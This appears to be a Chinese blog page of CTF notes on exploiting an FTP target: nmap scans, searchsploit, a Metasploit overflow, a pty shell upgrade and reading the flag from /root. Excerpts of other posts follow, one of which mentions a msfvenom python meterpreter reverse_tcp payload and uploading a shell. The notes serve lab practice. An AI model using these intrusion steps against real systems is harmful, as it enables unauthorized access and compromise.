ctf web FTP思路筆記

2022-07-02 06:39:10 字數 581 閱讀 3478

資訊探測

nmap掃瞄發現主機服務資訊

掃瞄主機服務及服務版本   nmap –sv 靶機ip位址

快速掃瞄主機全部資訊  nmap –t4 –a –v 靶機位址

分析掃瞄結果

查詢漏洞是否有可利用資訊  seachsploit  服務版本 ,檢視漏洞資訊,找到可利用的溢位**,發現metasploit已經整合了該漏洞

展開攻擊

使用metasploit進行溢位分析

優化會話:-- python -c"import pty;pty.spawn(/bin/bash')」

獲得flag:一般情況下flag存放在伺服器根目錄下,/root/目錄下

cd /root/

ls –alh

cat flag

對於開放ftp、ssh、telnet等服務的系統,可以嘗試searchsploit去尋找漏洞**,並進行利用

支付思路流程筆記

配置金鑰 為了保證交易雙方 商戶和支付寶 的身份和資料安全,開發者在呼叫界面前,需要配置雙方金鑰,對交易資料進行雙方校驗。1 了解下支付寶金鑰處理體系 2 金鑰包含 應用公鑰 由商戶自己生成的rsa公鑰 與應用私鑰必須匹配 商戶需上傳應用公鑰到支付寶開放平台,以便支付寶使用該公鑰驗證該交易是否是商戶...

ctf web SSI注入思路筆記

發現開放http服務,開啟網頁查詢敏感檔案,發現疑似存在命令注入漏洞 列舉當前目錄中的檔案和目錄 切換到指定目錄 給shell賦予可執行許可權 執行shell.py php的shell python的shell 生成 msfvenom p python meterpreter reverse tcp...

Spring mvc學習筆記 學習思路

官網 url 官方文件 docs選單 reference documention read the reference documentation spring project spring framwork 基礎 什麼是spring mvc.spring框架原理 spring mvc入門程式 sp...